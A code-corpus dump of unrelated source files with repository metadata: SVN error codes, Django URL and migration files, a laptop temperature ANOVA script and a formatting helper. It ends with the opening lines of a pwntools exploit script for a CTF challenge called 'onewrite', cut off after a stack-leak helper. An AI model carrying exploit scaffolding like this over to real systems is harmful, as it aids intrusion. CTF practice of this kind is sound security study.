ASSERTION_FAIL = 235000
ASSERTION_ONLY_TRACING_LINKS = 235001
ATOMIC_INIT_FAILURE = 200029
AUTHN_CREDS_NOT_SAVED = 215003
AUTHN_CREDS_UNAVAILABLE = 215000
AUTHN_FAILED = 215004
AUTHN_NO_PROVIDER = 215001
AUTHN_PROVIDERS_EXHAUSTED = 215002
AUTHZ_INVALID_CONFIG = 220003
AUTHZ_PARTIALLY_READABLE = 220002
AUTHZ_ROOT_UNREADABLE = 220000
AUTHZ_UNREADABLE = 220001
AUTHZ_UNWRITABLE = 220004
BAD_ATOMIC = 125015
BAD_CHANGELIST_NAME = 125014
BAD_CHECKSUM_KIND = 125011
BAD_CHECKSUM_PARSE = 125012
BAD_CONFIG_VALUE = 125009
BAD_CONTAINING_POOL = 125000
BAD_DATE = 125003
BAD_FILENAME = 125001
BAD_MIME_TYPE = 125004
BAD_PROPERTY_VALUE = 125005
BAD_PROP_KIND = 200008
BAD_RELATIVE_PATH = 125007
BAD_SERVER_SPECIFICATION = 125010
BAD_TOKEN = 125013
BAD_URL = 125002
BAD_UUID = 125008
BAD_VERSION_FILE_FORMAT = 125006
BASE = 200000
CANCELLED = 200015
CEASE_INVOCATION = 200021
CHECKSUM_MISMATCH = 200014
CLIENT_BAD_REVISION = 195002
CLIENT_CYCLE_DETECTED = 195019
CLIENT_DUPLICATE_COMMIT_URL = 195003
CLIENT_FILE_EXTERNAL_OVERWRITE_VERSIONED = 195017
CLIENT_FORBIDDEN_BY_SERVER = 195023
CLIENT_INVALID_EXTERNALS_DESCRIPTION = 195005
CLIENT_INVALID_MERGEINFO_NO_MERGETRACKING = 195021
CLIENT_INVALID_RELOCATION = 195009
CLIENT_IS_BINARY_FILE = 195004
CLIENT_IS_DIRECTORY = 195007
CLIENT_MERGE_UPDATE_REQUIRED = 195020
CLIENT_MISSING_LOCK_TOKEN = 195013
CLIENT_MODIFIED = 195006
CLIENT_MULTIPLE_SOURCES_DISALLOWED = 195014
CLIENT_NOT_READY_TO_MERGE = 195016
CLIENT_NO_LOCK_TOKEN = 195022
CLIENT_NO_VERSIONED_PARENT = 195015
CLIENT_PATCH_BAD_STRIP_COUNT = 195018
CLIENT_PROPERTY_NAME = 195011
CLIENT_RA_ACCESS_REQUIRED = 195001
CLIENT_REVISION_AUTHOR_CONTAINS_NEWLINE = 195010
CLIENT_REVISION_RANGE = 195008
CLIENT_UNRELATED_RESOURCES = 195012
CLIENT_VERSIONED_PATH_REQUIRED = 195000
CL_ADM_DIR_RESERVED = 205003
CL_ARG_PARSING_ERROR = 205000
CL_BAD_LOG_MESSAGE = 205008
CL_COMMIT_IN_ADDED_DIR = 205006
CL_ERROR_PROCESSING_EXTERNALS = 205011
CL_INSUFFICIENT_ARGS = 205001
CL_LOG_MESSAGE_IS_PATHNAME = 205005
CL_LOG_MESSAGE_IS_VERSIONED_FILE = 205004
CL_MUTUALLY_EXCLUSIVE_ARGS = 205002
CL_NO_EXTERNAL_EDITOR = 205007
CL_NO_EXTERNAL_MERGE_TOOL = 205010
CL_UNNECESSARY_LOG_MESSAGE = 205009
CORRUPTED_ATOMIC_STORAGE = 200038
DELTA_MD5_CHECKSUM_ABSENT = 200010
DIFF_DATASOURCE_MODIFIED = 225000
DIR_NOT_EMPTY = 200011
ENTRY_ATTRIBUTE_INVALID = 150005
ENTRY_EXISTS = 150002
ENTRY_FORBIDDEN = 150006
ENTRY_MISSING_REVISION = 150003
ENTRY_MISSING_URL = 150004
ENTRY_NOT_FOUND = 150000
EXTERNAL_PROGRAM = 200012
FS_ALREADY_EXISTS = 160020
FS_ALREADY_OPEN = 160002
FS_BAD_LOCK_TOKEN = 160037
FS_BERKELEY_DB = 160029
FS_BERKELEY_DB_DEADLOCK = 160030
FS_CLEANUP = 160001
FS_CONFLICT = 160024
FS_CORRUPT = 160004
FS_GENERAL = 160000
FS_ID_NOT_FOUND = 160014
FS_INCORRECT_EDITOR_COMPLETION = 160050
FS_LOCK_EXPIRED = 160041
FS_LOCK_OWNER_MISMATCH = 160039
FS_MALFORMED_SKEL = 160027
FS_NOT_DIRECTORY = 160016
FS_NOT_FILE = 160017
FS_NOT_FOUND = 160013
FS_NOT_ID = 160015
FS_NOT_MUTABLE = 160019
FS_NOT_OPEN = 160003
FS_NOT_REVISION_ROOT = 160023
FS_NOT_SINGLE_PATH_COMPONENT = 160018
FS_NOT_TXN_ROOT = 160022
FS_NO_LOCK_TOKEN = 160038
FS_NO_SUCH_CHECKSUM_REP = 160048
FS_NO_SUCH_COPY = 160011
FS_NO_SUCH_ENTRY = 160008
FS_NO_SUCH_LOCK = 160040
FS_NO_SUCH_NODE_ORIGIN = 160046
FS_NO_SUCH_REPRESENTATION = 160009
FS_NO_SUCH_REVISION = 160006
FS_NO_SUCH_STRING = 160010
FS_NO_SUCH_TRANSACTION = 160007
FS_NO_USER = 160034
FS_OUT_OF_DATE = 160042
FS_PACKED_REVPROP_READ_FAILURE = 160051
FS_PATH_ALREADY_LOCKED = 160035
FS_PATH_NOT_LOCKED = 160036
FS_PATH_SYNTAX = 160005
FS_PROP_BASEVALUE_MISMATCH = 160049
FS_REP_BEING_WRITTEN = 160044
FS_REP_CHANGED = 160025
FS_REP_NOT_MUTABLE = 160026
FS_REVPROP_CACHE_INIT_FAILURE = 160052
FS_ROOT_DIR = 160021
FS_TRANSACTION_DEAD = 160031
FS_TRANSACTION_NOT_DEAD = 160032
FS_TRANSACTION_NOT_MUTABLE = 160012
FS_TXN_NAME_TOO_LONG = 160045
FS_TXN_OUT_OF_DATE = 160028
FS_UNKNOWN_FS_TYPE = 160033
FS_UNSUPPORTED_FORMAT = 160043
FS_UNSUPPORTED_UPGRADE = 160047
ILLEGAL_TARGET = 200009
INCOMPLETE_DATA = 200003
INCORRECT_PARAMS = 200004
INVALID_DIFF_OPTION = 200016
IO_CORRUPT_EOL = 135002
IO_INCONSISTENT_EOL = 135000
IO_PIPE_FRAME_ERROR = 135004
IO_PIPE_READ_ERROR = 135005
IO_PIPE_WRITE_ERROR = 135007
IO_UNIQUE_NAMES_EXHAUSTED = 135003
IO_UNKNOWN_EOL = 135001
IO_WRITE_ERROR = 135006
ITER_BREAK = 200023
MALFORMED_FILE = 200002
MALFORMED_VERSION_STRING = 200037
MERGEINFO_PARSE_ERROR = 200020
NODE_UNEXPECTED_KIND = 145001
NODE_UNKNOWN_KIND = 145000
NO_APR_MEMCACHE = 200028
NO_AUTH_FILE_PATH = 200018
PLUGIN_LOAD_FAILURE = 200001
PROPERTY_NOT_FOUND = 200017
RA_CANNOT_CREATE_TUNNEL = 170012
RA_DAV_ALREADY_EXISTS = 175005
RA_DAV_CONN_TIMEOUT = 175012
RA_DAV_CREATING_REQUEST = 175001
RA_DAV_FORBIDDEN = 175013
RA_DAV_INVALID_CONFIG_VALUE = 175006
RA_DAV_MALFORMED_DATA = 175009
RA_DAV_OPTIONS_REQ_FAILED = 175003
RA_DAV_PATH_NOT_FOUND = 175007
RA_DAV_PROPPATCH_FAILED = 175008
RA_DAV_PROPS_NOT_FOUND = 175004
RA_DAV_RELOCATED = 175011
RA_DAV_REQUEST_FAILED = 175002
RA_DAV_RESPONSE_HEADER_BADNESS = 175010
RA_DAV_SOCK_INIT = 175000
RA_ILLEGAL_URL = 170000
RA_LOCAL_REPOS_NOT_FOUND = 180000
RA_LOCAL_REPOS_OPEN_FAILED = 180001
RA_NOT_AUTHORIZED = 170001
RA_NOT_IMPLEMENTED = 170003
RA_NOT_LOCKED = 170007
RA_NO_REPOS_UUID = 170005
RA_OUT_OF_DATE = 170004
RA_PARTIAL_REPLAY_NOT_SUPPORTED = 170008
RA_REPOS_ROOT_URL_MISMATCH = 170010
RA_SERF_GSSAPI_INITIALISATION_FAILED = 230002
RA_SERF_SSL_CERT_UNTRUSTED = 230001
RA_SERF_SSPI_INITIALISATION_FAILED = 230000
RA_SERF_WRAPPED_ERROR = 230003
RA_SESSION_URL_MISMATCH = 170011
RA_SVN_BAD_VERSION = 210006
RA_SVN_CMD_ERR = 210000
RA_SVN_CONNECTION_CLOSED = 210002
RA_SVN_EDIT_ABORTED = 210008
RA_SVN_IO_ERROR = 210003
RA_SVN_MALFORMED_DATA = 210004
RA_SVN_NO_MECHANISMS = 210007
RA_SVN_REPOS_NOT_FOUND = 210005
RA_SVN_UNKNOWN_CMD = 210001
RA_UNKNOWN_AUTH = 170002
RA_UNSUPPORTED_ABI_VERSION = 170006
RA_UUID_MISMATCH = 170009
REPOS_BAD_ARGS = 165002
REPOS_BAD_REVISION_REPORT = 165004
REPOS_DISABLED_FEATURE = 165006
REPOS_HOOK_FAILURE = 165001
REPOS_LOCKED = 165000
REPOS_NO_DATA_FOR_REPORT = 165003
REPOS_POST_COMMIT_HOOK_FAILED = 165007
REPOS_POST_LOCK_HOOK_FAILED = 165008
REPOS_POST_UNLOCK_HOOK_FAILED = 165009
REPOS_UNSUPPORTED_UPGRADE = 165010
REPOS_UNSUPPORTED_VERSION = 165005
RESERVED_FILENAME_SPECIFIED = 200025
REVNUM_PARSE_FAILURE = 200022
SQLITE_BUSY = 200033
SQLITE_CONSTRAINT = 200035
SQLITE_ERROR = 200030
SQLITE_READONLY = 200031
SQLITE_RESETTING_FOR_ROLLBACK = 200034
SQLITE_UNSUPPORTED_SCHEMA = 200032
STREAM_MALFORMED_DATA = 140001
STREAM_SEEK_NOT_SUPPORTED = 140003
STREAM_UNEXPECTED_EOF = 140000
STREAM_UNRECOGNIZED_DATA = 140002
SVNDIFF_BACKWARD_VIEW = 185002
SVNDIFF_CORRUPT_WINDOW = 185001
SVNDIFF_INVALID_COMPRESSED_DATA = 185005
SVNDIFF_INVALID_HEADER = 185000
SVNDIFF_INVALID_OPS = 185003
SVNDIFF_UNEXPECTED_END = 185004
SWIG_PY_EXCEPTION_SET = 200013
TEST_FAILED = 200006
TEST_SKIPPED = 200027
TOO_MANY_MEMCACHED_SERVERS = 200036
UNKNOWN_CAPABILITY = 200026
UNKNOWN_CHANGELIST = 200024
UNSUPPORTED_FEATURE = 200007
UNVERSIONED_RESOURCE = 200005
VERSION_MISMATCH = 200019
WC_BAD_ADM_LOG = 155009
WC_BAD_ADM_LOG_START = 155020
WC_BAD_PATH = 155022
WC_CANNOT_DELETE_FILE_EXTERNAL = 155030
WC_CANNOT_MOVE_FILE_EXTERNAL = 155031
WC_CHANGELIST_MOVE = 155029
WC_CLEANUP_REQUIRED = 155037
WC_CONFLICT_RESOLVER_FAILURE = 155027
WC_COPYFROM_PATH_NOT_FOUND = 155028
WC_CORRUPT = 155016
WC_CORRUPT_TEXT_BASE = 155017
WC_DB_ERROR = 155032
WC_DUPLICATE_EXTERNALS_TARGET = 155041
WC_FOUND_CONFLICT = 155015
WC_INVALID_LOCK = 155006
WC_INVALID_OPERATION_DEPTH = 155038
WC_INVALID_OP_ON_CWD = 155019
WC_INVALID_RELOCATION = 155024
WC_INVALID_SCHEDULE = 155023
WC_INVALID_SWITCH = 155025
WC_LEFT_LOCAL_MOD = 155012
WC_LOCKED = 155004
WC_MISMATCHED_CHANGELIST = 155026
WC_MISSING = 155033
WC_MIXED_REVISIONS = 155040
WC_NODE_KIND_CHANGE = 155018
WC_NOT_FILE = 155008
WC_NOT_LOCKED = 155005
WC_NOT_SYMLINK = 155034
WC_NOT_UP_TO_DATE = 155011
WC_NOT_WORKING_COPY = 155007
WC_OBSTRUCTED_UPDATE = 155000
WC_PATH_ACCESS_DENIED = 155039
WC_PATH_FOUND = 155014
WC_PATH_NOT_FOUND = 155010
WC_PATH_UNEXPECTED_STATUS = 155035
WC_SCHEDULE_CONFLICT = 155013
WC_UNSUPPORTED_FORMAT = 155021
WC_UNWIND_EMPTY = 155002
WC_UNWIND_MISMATCH = 155001
WC_UNWIND_NOT_EMPTY = 155003
WC_UPGRADE_REQUIRED = 155036
XML_ATTRIB_NOT_FOUND = 130000
XML_MALFORMED = 130003
XML_MISSING_ANCESTRY = 130001
XML_UNESCAPABLE_DATA = 130004
XML_UNKNOWN_ENCODING = 130002
def __init__(self, errorCode):
name = 'SVNERR_' + self.name
bases = (SVNError,)
cls_dict = {}
me = self
# Methods
def __init__(self, message, returncode, cmd):
super(me.errcls, self).__init__(message, returncode, cmd)
self.svn_errcode = me
cls_dict['__init__'] = __init__
self.errcls = types.new_class(name, bases, {}, lambda ns: ns.update(cls_dict))
| [
"jjarecki@mruecker-desktop"
] | jjarecki@mruecker-desktop |
3763a13d4467d60994b0eaf0d4b6f867b09314da | 7760d9cddd00041afa308c739fd3de23800c14c6 | /urls.py | 8a34fd657d1dc7da3b829174179b5a434ec7f866 | [] | no_license | IanJames2/LogandReg_Python | 01a9ebd3ad14c9237c37c8010f7523eb43d68b56 | 02fb6d520b173e5ff6af67ff520e7b5dfaeed0f4 | refs/heads/main | 2023-04-19T07:28:26.376232 | 2021-04-29T16:23:55 | 2021-04-29T16:23:55 | 362,627,131 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 313 | py | from django.urls import path
from . import views
urlpatterns = [
path('', views.index),
path('login', views.login),
path('users', views.register),
path('addmovie', views.movie_input),
path('movie_added', views.added_movie),
path('logout', views.logout)
]
#dashboard = success | [
"noreply@github.com"
] | noreply@github.com |
12c59a6154a461bf8059070f15b4a4dea294ecf4 | e6abe4aca3994c9f98bedb561a522505caff4b7e | /mblog/migrations/0002_auto_20170901_1708.py | d674f72376381be696a04490fe048c76d4c8748f | [] | no_license | has727/newBlog | 093d9f93ed0b78d7de76c7f39f8d99e4831c0970 | 37073ece4c648e136500d727423226cebdf4841e | refs/heads/master | 2021-01-21T12:30:48.474803 | 2017-09-01T09:56:07 | 2017-09-01T09:56:07 | 102,074,996 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 805 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-09-01 09:08
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('mblog', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='entry',
options={'verbose_name_plural': 'entries'},
),
migrations.AddField(
model_name='topic',
name='owner',
field=models.ForeignKey(default=1, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
preserve_default=False,
),
]
| [
"has727@outlook.com"
] | has727@outlook.com |
4816cdf55b4591eae540be22cb3795910608a838 | cf0ae24e1df5e38c0952d5b1eb73799df92b67dd | /user_group/urls.py | 24ae4f995ba232e7ca465df886e4ca99411d0f56 | [] | no_license | gunarevuri/User_Specific_Roles | 8b3f7656261b9a577ba1feb25b6e887a0aa19586 | b679fc2e481cf0204d8fe3447a83ec7bae6627ad | refs/heads/master | 2022-11-30T15:27:30.847116 | 2020-08-16T14:21:15 | 2020-08-16T14:21:15 | 287,444,982 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,675 | py | from django.contrib import admin
from django.urls import path
from app import views
from django.contrib.auth import views as auth_views
from rest_framework_jwt.views import obtain_jwt_token, verify_jwt_token, refresh_jwt_token
urlpatterns = [
path('admin/', admin.site.urls),
path('', views.home, name='home'),
path('select-user/', views.Select_User_type_view, name='select-user'),
path('studet-register/', views.StudentRegestration_view, name='student-register'),
path('teacher-register/', views.TeacherRegestration_view, name='teacher-register'),
path('get-all-students/', views.Student_Get_List, name='get-all-students'),
path('get-student/<int:id>/', views.Student_Get_detail, name='get-student-specific'),
path('update-student/<int:id>/', views.Student_detail, name='update-student'),
path('delete-student/<int:id>/', views.Student_detail, name='delete-student'),
path('get-all-teachers/', views.Teacher_Get_List, name='get-all-teachers'),
path('get-teacher/<int:id>/', views.Teacher_Get_detail, name='get-teacher'),
path('update-teacher/<int:id>/', views.Teacher_detail, name='update-teacher'),
path('delete-teacher/<int:id>/', views.Teacher_detail, name='delete-teacher'),
path('add-student/', views.Student_Get_Post_list, name='add-student'),
path('add-teacher', views.Teacher_Get_Post_list, name='add-teacher'),
path('students/', views.Student_Get_List, name='students'),
path('teachers/', views.Teacher_Get_detail, name='teachers'),
path('register/', views.registration_view, name='register'),
path('login/',
auth_views.LoginView.as_view(template_name = 'app/login.html'),
name='login'
),
path('logout/',
auth_views.LogoutView.as_view(template_name = 'app/logout.html'),
name='logout'
),
path('password-reset/',
auth_views.PasswordResetView.as_view(template_name = 'app/password_reset.html'),
name='password_reset'
),
path('password-reset/done/',
auth_views.PasswordResetDoneView.as_view(template_name = 'app/password_reset_done.html'),
name='password_reset_done'
),
path('password-reset-confirm/<uidb64>/<token>/',
auth_views.PasswordResetConfirmView.as_view(template_name = 'app/password_reset_confirm.html'),
name='password_reset_confirm'
),
path('password-reset-complete/',
auth_views.PasswordResetCompleteView.as_view(template_name = 'app/password_reset_complete.html'),
name='password_reset_complete'
),
# JWT urls implementation
path('api-auth/', include("rest_framewor.urls")),
path('api/token/', obtain_jwt_token, name='obtain-token'),
path('api/token/verify/', verify_jwt_token, name='verify-token'),
path('api/token/refresh/', refresh_jwt_token, name='refresh-token'),
]
| [
"gunarevuri@gmail.com"
] | gunarevuri@gmail.com |
5b51126a4fd9d20c0b17017409aed3f5df7dac5d | add47f91c68d6a7f0b1d8f60455594aba7dcf61c | /scripts/main.py | 73887ba21d067dfb0229ea09f68947c9aa194428 | [] | no_license | thejusp/BurnLaptop | 7991a3abcafafb783eeb3019d3403f94158feb95 | 0dda109d3d2971b15bba02fe65d8d962971f1f72 | refs/heads/master | 2021-06-26T01:50:09.513248 | 2021-04-14T14:25:14 | 2021-04-14T14:25:14 | 226,454,013 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,382 | py | #!/usr/bin/env python
import numpy as np
import datastructure as ds
import scipy.stats as ss
from astropy.table import Table
import matplotlib.pyplot as plt
datastructure = ds.DataStructure()
# Note: Software Sequences
# [ G1 , G2 , G3 , G4 , G5 ]
# [ SVG, WOT, TSR, PTN, COW]
A_G1 = [datastructure.SVG.A.temperatureIR,datastructure.SVG.A.noise,datastructure.SVG.A.time]
B_G1 = [datastructure.SVG.B.temperatureIR,datastructure.SVG.B.noise,datastructure.SVG.B.time]
C_G1 = [datastructure.SVG.C.temperatureIR,datastructure.SVG.C.noise,datastructure.SVG.C.time]
D_G1 = [datastructure.SVG.D.temperatureIR,datastructure.SVG.D.noise,datastructure.SVG.D.time]
E_G1 = [datastructure.SVG.E.temperatureIR,datastructure.SVG.E.noise,datastructure.SVG.E.time]
A_G2 = [datastructure.WOT.A.temperatureIR,datastructure.WOT.A.noise,datastructure.WOT.A.time]
B_G2 = [datastructure.WOT.B.temperatureIR,datastructure.WOT.B.noise,datastructure.WOT.B.time]
C_G2 = [datastructure.WOT.C.temperatureIR,datastructure.WOT.C.noise,datastructure.WOT.C.time]
D_G2 = [datastructure.WOT.D.temperatureIR,datastructure.WOT.D.noise,datastructure.WOT.D.time]
E_G2 = [datastructure.WOT.E.temperatureIR,datastructure.WOT.E.noise,datastructure.WOT.E.time]
A_G3 = [datastructure.TSR.A.temperatureIR,datastructure.TSR.A.noise,datastructure.TSR.A.time]
B_G3 = [datastructure.TSR.B.temperatureIR,datastructure.TSR.B.noise,datastructure.TSR.B.time]
C_G3 = [datastructure.TSR.C.temperatureIR,datastructure.TSR.C.noise,datastructure.TSR.C.time]
D_G3 = [datastructure.TSR.D.temperatureIR,datastructure.TSR.D.noise,datastructure.TSR.D.time]
E_G3 = [datastructure.TSR.E.temperatureIR,datastructure.TSR.E.noise,datastructure.TSR.E.time]
A_G4 = [datastructure.PTN.A.temperatureIR,datastructure.PTN.A.noise,datastructure.PTN.A.time]
B_G4 = [datastructure.PTN.B.temperatureIR,datastructure.PTN.B.noise,datastructure.PTN.B.time]
C_G4 = [datastructure.PTN.C.temperatureIR,datastructure.PTN.C.noise,datastructure.PTN.C.time]
D_G4 = [datastructure.PTN.D.temperatureIR,datastructure.PTN.D.noise,datastructure.PTN.D.time]
E_G4 = [datastructure.PTN.E.temperatureIR,datastructure.PTN.E.noise,datastructure.PTN.E.time]
A_G5 = [datastructure.COW.A.temperatureIR,datastructure.COW.A.noise,datastructure.COW.A.time]
B_G5 = [datastructure.COW.B.temperatureIR,datastructure.COW.B.noise,datastructure.COW.B.time]
C_G5 = [datastructure.COW.C.temperatureIR,datastructure.COW.C.noise,datastructure.COW.C.time]
D_G5 = [datastructure.COW.D.temperatureIR,datastructure.COW.D.noise,datastructure.COW.D.time]
E_G5 = [datastructure.COW.E.temperatureIR,datastructure.COW.E.noise,datastructure.COW.E.time]
data_List = np.array([[A_G1, A_G2, A_G3, A_G4, A_G5],
[B_G1, B_G2, B_G3, B_G4, B_G5],
[C_G1, C_G2, C_G3, C_G4, C_G5],
[D_G1, D_G2, D_G3, D_G4, D_G5],
[E_G1, E_G2, E_G3, E_G4, E_G5]])
# Note: Mean_Temp_Noise return mean values of data types
# For the current use case, the input "data" has 3 dimensions
# the 1st dimension : no of laptops
# the 2nd dimension : no of Games/Observations
# the last dimension: no of types of data collected (such as temp, noise)
# Therefore,
# Output : mean value of data in 3 dimensions
def mean_Std(data):
# check the shape of the data
data_Shape = data.shape
data_mean_return = np.zeros(data.shape)
data_grandMean = np.zeros((data_Shape[0],data_Shape[2]))
data_std = np.zeros((data_Shape[0],data_Shape[2]))
for i in range(0,data_Shape[0]):
for j in range(0,data_Shape[1]):
for k in range(0,data_Shape[2]):
data_mean_return[i][j][k] = round(np.mean(data_List[i,j,k]),2)
for eachLaptop in range(data_Shape[0]):
for eachData in range(data_Shape[2]):
data_grandMean[eachLaptop][eachData]=round(np.mean(data_mean_return
[eachLaptop,:,eachData]),2)
data_std[eachLaptop][eachData]=round(np.std(data_mean_return
[eachLaptop,:,eachData],ddof=1),2)
return data_mean_return, data_grandMean,data_std
# input1 of table function : Table title (string type)
# input2 of table function : dType: 0: temp
# 1: noise
def table(title,dType):
row_names = ['1','2','3','4','5','Mean','Std']
column_names = ['Observation\Laptop','A','B','C','D','E']
mean_std = mean_Std(data_List)
data_Rows = [(row_names[0],mean_std[0][0,0,dType],mean_std[0][1,0,dType],
mean_std[0][2,0,dType],mean_std[0][3,0,dType],
mean_std[0][4,0,dType]),
(row_names[1],mean_std[0][0,1,dType],mean_std[0][1,1,dType],
mean_std[0][2,1,dType],mean_std[0][3,1,dType],
mean_std[0][4,1,dType]),
(row_names[2],mean_std[0][0,2,dType],mean_std[0][1,2,dType],
mean_std[0][2,2,dType],mean_std[0][3,2,dType],
mean_std[0][4,2,dType]),
(row_names[3],mean_std[0][0,3,dType],mean_std[0][1,3,dType],
mean_std[0][2,3,dType],mean_std[0][3,3,dType],
mean_std[0][4,3,dType]),
(row_names[4],mean_std[0][0,4,dType],mean_std[0][1,4,dType],
mean_std[0][2,4,dType],mean_std[0][3,4,dType],
mean_std[0][4,4,dType]),
(row_names[5],mean_std[1][0,dType],mean_std[1][1,dType],
mean_std[1][2,dType],mean_std[1][3,dType],
mean_std[1][4,dType]),
(row_names[6],mean_std[2][0,dType],mean_std[2][1,dType],
mean_std[2][2,dType],mean_std[2][3,dType],
mean_std[2][4,dType])]
table = Table(rows = data_Rows, names = column_names)
print(table)
print(title)
# input1 of anova_Analysis : data_List(Laptops, Games, data such as temp,noise)
# input2 of anova_Analysis : dType (specify data which you want to analyse )
# dType: 0 for Temp, 1 for Noise)
def anova_Analysis(data_list,dType):
dataType = {0: 'Temperatures', 1: 'Noises'}
mean_data = mean_Std(data_list)
F,p = ss.f_oneway(mean_data[0][0,:,dType],mean_data[0][1,:,dType],
mean_data[0][2,:,dType],mean_data[0][3,:,dType],
mean_data[0][4,:,dType])
print("\n")
if(p<0.05):
print("The mean values of Laptop "+dataType[dType]+""" are
statistically significant. Therefore, we reject the null
hypothesis""")
elif(p>0.05):
print("The mean values of Laptop "+dataType[dType]+""" are
not statistically significant. Therefore, we failed to reject
the null hypothesis""")
# plot function plot
# input 1 : laptop X you would like to observe( you may refer laptopDict in Fn)
# input 2 : game Y you would ike observe (you may refer gameDict in Fn)
# input 3 : data you would like to plot (you may refer axisDict in Fn)
# input 4 : main data you have to put
def multiplot(laptop,game,data,data_list):
plt.figure()
x_axis = data[0]
y_axis = data[1]
laptopDict = {0:'A',1:'B',2:'C',3:'D',4:'E'}
gameDict = {0:'G1',1:'G2',2:'G3',3:'G4',4:'G5'}
axisDict = {0:'Temp',1:'Noise',2:'Time'}
for i in laptop:
data_label = ' '
for j in game:
data_label = laptopDict[i]+'_'+gameDict[j]
plt.plot(data_list[i][j][x_axis],data_list[i][j][y_axis],
label = data_label)
plt.xlabel(axisDict[x_axis])
plt.ylabel(axisDict[y_axis])
plt.legend(loc='upper right')
plt.show()
def tukeyComparison(data_list,dType):
k = len(data_List[0])
n= k**2
dof = [k,n-k]
# q table is read from the following link
#https://www2.stat.duke.edu/courses/Spring98/sta110c/qtable.html
q_critical_0_05 = 4.23
mean_std = mean_Std(data_list)
for each in mean_std[2][:,dType]:
SSW = (k-1)*each**2
MSW = SSW/dof[1]
T = q_critical_0_05*np.sqrt(MSW/k)
mean = mean_std[1][:,dType]
rejected_Dict = {}
accepted_Dict = {}
laptop_Dict = {0:'A',1:'B',2:'C',3:'D',4:'E'}
for i in laptop_Dict.keys():
for j in laptop_Dict.keys():
diff = round(mean[i]-mean[j],2)
key = laptop_Dict.get(i)+laptop_Dict.get(j)
if(abs(diff)==0):
pass
elif(abs(diff)>T):
rejected_Dict.update({key:abs(diff)})
elif(abs(diff)<T):
accepted_Dict.update({key:abs(diff)})
accepted_Tuple = sorted(accepted_Dict.items(), key=lambda diff: abs(diff[1]))
rejected_Tuple = sorted(rejected_Dict.items(), key=lambda diff: abs(diff[1]))
[print("Accepted Pair",each) for each in accepted_Tuple]
print("\n")
[print("Rejected Pair",each) for each in rejected_Tuple]
return accepted_Tuple, rejected_Tuple
table("Table 1: Temperature of Laptops across 5 observations",0)
print("\n")
table("Table 2: Noise of Laptops across 5 observations",1)
anova_Analysis(data_List,0)
anova_Analysis(data_List,1)
multiplot([0,1,2,3,4],[0,1,2,3,4],[2,1],data_List)
result = tukeyComparison(data_List,0)
| [
"thejus@lionsbot.com"
] | thejus@lionsbot.com |
6a4675054e6b1622b80d37ae794ec9fbb98e9ef6 | bdd2bbef297d6edd3d335c48ab89955925d331d5 | /encyclopedia/urls.py | 5f0ded8610846862e5b0f87a8029d45d825b1c9c | [] | no_license | michelle2014/CS50W-Wiki | 424569bb1e2fd7c83fa7ff2a98c51821bcfc04fb | 0301e48db06720b0419c5939816a9be345dff9b0 | refs/heads/master | 2023-07-28T05:05:42.512177 | 2021-09-05T05:33:06 | 2021-09-05T05:33:06 | 327,516,261 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 312 | py | from django.urls import path
from . import views
urlpatterns = [
path("", views.index, name="index"),
path("create", views.create, name="create"),
path("edit/<str:title>", views.edit, name="edit"),
path("search", views.search, name="search"),
path("<str:title>", views.entry, name="entry")
] | [
"michelle.transbetter@gmail.com"
] | michelle.transbetter@gmail.com |
a7a105f0306eb834baeef78f4a9c96a64ce5032b | 3df5a2ff77403c077199853c0fa7afe49c290568 | /python/smache/exceptions.py | bf0ce2c7caa4d87bf4aeae1138233f7fdab0a001 | [] | no_license | bruce2008github/smache | d3370b494b411790e17088014c40347838aaf97b | be34b7370ef946a01293dd8e539bf976d25cf4f4 | refs/heads/master | 2021-01-18T21:00:07.097570 | 2011-01-03T16:59:47 | 2011-01-03T16:59:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 167 | py | #!/usr/bin/env python
class SmacheException(Exception):
pass
class ConfigException(SmacheException):
pass
class BackendException(SmacheException):
pass
| [
"amscanne@adin-ubuntu-dev.(none)"
] | amscanne@adin-ubuntu-dev.(none) |
80e3880492a040c298690f13180e5e63662152df | 8be5db190392dc87ab24584b0a3518329320ac8a | /fid/utils/printing.py | 52d7c24a2a6bb66ac8d592439d8545e4c9749234 | [
"MIT"
] | permissive | jma100/SPADE_eval | 6eccead21879bf5195e82d2dfb45ca79c2599de3 | 73ae45e79a7296651e9ea4091bffaf5b154d15ec | refs/heads/master | 2020-09-25T23:31:00.828438 | 2019-12-05T17:53:40 | 2019-12-05T17:53:40 | 226,113,754 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 503 | py | import torch
# TODO: add zero padded int
def format_str_one(v, float_prec=6):
if isinstance(v, torch.Tensor) and v.numel() == 1:
v = v.item()
if isinstance(v, float):
return ('{:.' + str(float_prec) + 'f}').format(v)
return str(v)
def format_str(*args, format_opts={}, **kwargs):
ss = [format_str_one(arg, **format_opts) for arg in args]
for k, v in kwargs.items():
ss.append('{}: {}'.format(k, format_str_one(v, **format_opts)))
return '\t'.join(ss)
| [
"jingweim@visiongpu22.csail.mit.edu"
] | jingweim@visiongpu22.csail.mit.edu |
1de610a31728f101b5dad9f241a84f4d1262e52b | 66a262fe264882adfdd45c2e7507988f4b4f1954 | /2019-INSomnihack-teaser/onewrite/onewrite.py | 542e338c812fa4b11b4966f9f2f8cd5fd6f203e6 | [] | no_license | Nepire/Pwn-Collection | 1b5bfb6a5a6171da0ccae970caf16d39507d54b4 | 3a63710e66683c117918fc716079acdafd010010 | refs/heads/master | 2020-03-15T23:50:05.645571 | 2019-03-11T06:46:23 | 2019-03-11T06:46:23 | 132,401,669 | 0 | 0 | null | 2019-01-26T15:37:05 | 2018-05-07T03:22:03 | Python | UTF-8 | Python | false | false | 5,436 | py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# Author = nepire
#
# Distributed under terms of the MIT license.
from pwn import*
context(os='linux',arch='amd64',log_level='debug')
n = process('./onewrite')
#n = remote('onewrite.teaser.insomnihack.ch',1337)
elf = ELF('./onewrite')
def leak_stack():
n.recvuntil('>')
